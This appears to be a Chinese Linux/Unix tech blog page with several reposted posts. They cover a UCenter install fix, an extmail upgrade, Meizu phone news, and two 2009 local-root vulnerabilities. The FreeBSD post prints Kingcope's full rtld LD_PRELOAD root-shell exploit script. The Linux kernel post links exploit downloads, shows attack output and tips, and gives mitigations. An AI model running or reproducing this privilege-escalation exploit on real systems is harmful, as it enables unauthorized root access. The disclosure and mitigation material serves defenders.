.uc_server/data
.uc_server/data/cache
.uc_server/data/view
.uc_server/data/avatar
.uc_server/data/logs
.uc_server/data/backup
.uc_server/data/tmp
这样再进行程序的安装,Ucenter就可以顺利登录了。
Unix/Linux技术
2010, April 8, 11:30 PM
[置顶] 浙江桐庐山水涧-徒步穿越
关于UCenter登录后空白的问题
No Comments | Unix/Linux技术 | by bigsea | 59 Views. | 2010, August 26, 5:44 PMextmail_upgrade_howto
No Comments | Unix/Linux技术 | by bigsea | 823 Views. | 2010, May 17, 2:54 PM本文档只能适用于数据库是mysql的版本,假设安装邮局的域名为extmail.org,请根据自身实际情况予以修改。
1、停止Apache服务:
shell
# service httpd stop
2、备份邮件数据:
» 阅读全文
FreeBSD爆严重安全漏洞,安全专家称疑是圣诞前的礼物
No Comments | Unix/Linux技术 | by bigsea | 1189 Views. | 2009, December 2, 2:35 PM在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长 期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。
在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共 公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。
接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。
相关脚本如下:
#!/bin/sh
echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
execl(”/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env > /dev/null 2>&1
#download from baoz.net
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system(”echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env
FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。
黑客再爆Linux内核高危漏洞,一个命令可以攻击所有Linux系统
No Comments | Unix/Linux技术 | by bigsea | 2188 Views. | 2009, August 16, 11:31 PM在微软本月月经日(8.11)的同一天,国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞,包括但不限于RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行一个命令,就可以通过此漏洞获得root权限,即使开启了SELinux也于事无补。攻击这个漏洞到底有多简单,下面我们看图说话,有图有真相。
CHANGELOGS:
2009/08/16 chenjun@xfocus提供了debian/ubuntu系统的修复方式。
2009/08/16 根据网友要求添加漏洞详情和exploit下载地址。
2009/08/16 改进修复方式,避免RHEL下的无效修复。感谢小阮MM反馈并提供服务器协助定位解决。
2009/08/16 添加攻击经验记录。感谢cnbird分享经验。
如上图所示,利用此漏洞极其简单,并且影响所有的Linux内核,baoz强烈建议系统管理员或安全人员参考下列临时修复方案,以防止Linux系统被攻击 。
1、使用Grsecurity或者Pax内核安全补丁,并开启KERNEXEC防护功能。
2、升级到2.6.31-rc6或2.4.37.5以上的内核版本。
3、如果您使用的是RedHa tEnterprise Linux 4/5的系统或Centos4/5的系统,您可以通过下面的操作简单的操作防止被攻击。
在/etc/modprobe.conf文件中加入下列内容:
install pppox /bin/true
install bluetooth /bin/true
install appletalk /bin/true
install ipx /bin/true
install sctp /bin/true
执行/sbin/lsmod | grep -e ppp -e blue -e app -e ipx -e sct,如果没有输出,你不需要重启,如果有输出,你需要重启系统,才可以对此攻击免疫。
下图是免疫前后的效果对比图:
4、如果您使用的是Debian或Ubuntu系统,您可以通过下面的操作防止被攻击(感谢chenjun提供)
cat > /etc/modprobe.d/mitigate-2692.conf << EOM
install ppp_generic /bin/true
install pppoe /bin/true
install pppox /bin/true
install slhc /bin/true
install bluetooth /bin/true
install ipv6 /bin/true
install irda /bin/true
install ax25 /bin/true
install x25 /bin/true
install ipx /bin/true
install appletalk /bin/true
EOM
/etc/init.d/bluez-utils stop
很明显,第三、四个方案最简单也相对有效,对业务影响也最小,如果您对编译和安装Linux内核不熟悉,千万不要使用前两个方案,否则您的系统可能永远无法启动。
如果你希望了解漏洞详情,请访问下列URL:
http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html
http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
https://bugzilla.redhat.com/show_bug.cgi?id=516949
如果你希望亲手验证此漏洞,你可以下载下列两个代码包测试(有可能导致系统不稳定,当机等现象,后果自负):
http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium-3.tgz
http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz
攻击经验记录:
1、如果selinux没开,会报缺少Pulseaudio文件,实际上根本不需要他,只是selinux没开导致的,用另外一个exp攻击同样不成功。从这里可以总结出来,如果你没开selinux,在现有的exploit下,不需要做任何操作,也不会受到攻击。当然,这个是我个人经验总结,并且只在RHEL5上验证过,请各位自己评估风险。顺带说一下,SElinux这东西,默认是开启的,如果你没关闭过他。根据我的猜测,可能是exp在bypass selinux那段代码里出了点问题。所以说改/etc/selinux/config文件,禁用selinux,也可以在一定程度上防范公开的exp。
[xiaoruan@localhost wunderbar_emporium]$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
Pulseaudio does not exist!
[xiaoruan@localhost run]$ sh run.sh
padlina z lublina!
mprotect: Cannot allocate memory
2、回连的shell溢出虽然可以成功,但uid不是0,解决办法是用一个带pty的shell。这个经验由cnbird提供。
Linux在微软的月经日爆如此严重的漏洞,挺值得纪念的。如果您希望了解本漏洞更多的内幕、八卦和细节,
本文转自包子博客http://baoz.net/linux-sockops-wrap-proto-ops-local-root-exploit/
ps:好久没看到linux下提权的漏洞了,在cb上看到有人直接执行w*命令,笑死了,在cb上的新闻也直接有点标题党的意思,一个溢出程序耗费了一个黑客的多少心血,一个命令就搞定太搞笑了;重点是下面的东西,呵呵
http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium-3.tgz
http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz
两个攻击程序包。
如果无法下载可以下载附件。
M8或在明年用上Android 带Wifi与WAPI版已送检
No Comments | Unix/Linux技术 | by bigsea | 1486 Views. | 2009, August 16, 10:20 PM
魅族公司老总 J.Wong 在魅族论坛透露,即将发布的新UI依然基于WINCE系统,而M8的Android的系统将在明年底正式面世,在此之前会放出测试版。另外,同时带有WAPI和WAFI的正式版M8已送检工信部,未来将没有测试版与正式版之分。以下是J.Wong原话: 原帖由 J.Wong 于 2009-8-16 17:33 发表 ps:I like Android!!! J.Wong中国的乔布斯,魅族,看好你~~M9再加上GPS明年换手机就是你了~~
带WAPI兼容WI FI的M8我们已送往工信部检测,取得新的入网许可证后就不存在正式版和测试版之分。
另外目前魅族的实力还很小,不可能在每个媒体上投入广告,等时机到了受众群体符合的媒体我们肯定会相应投入一些广告的 ...
原帖由 J.Wong 于 2009-8-16 20:01 发表
信号问题9月肯定能解决的。
原帖由 J.Wong 于 2009-8-16 19:50 发表
新UI首先是基于win ce的,基于Android的也会做,并会不定期放出给魅友测试,但估计要到明年年底才会比较完善。
原帖由 J.Wong 于 2009-8-16 19:54 发表
并不是说要明年年底魅友才能用上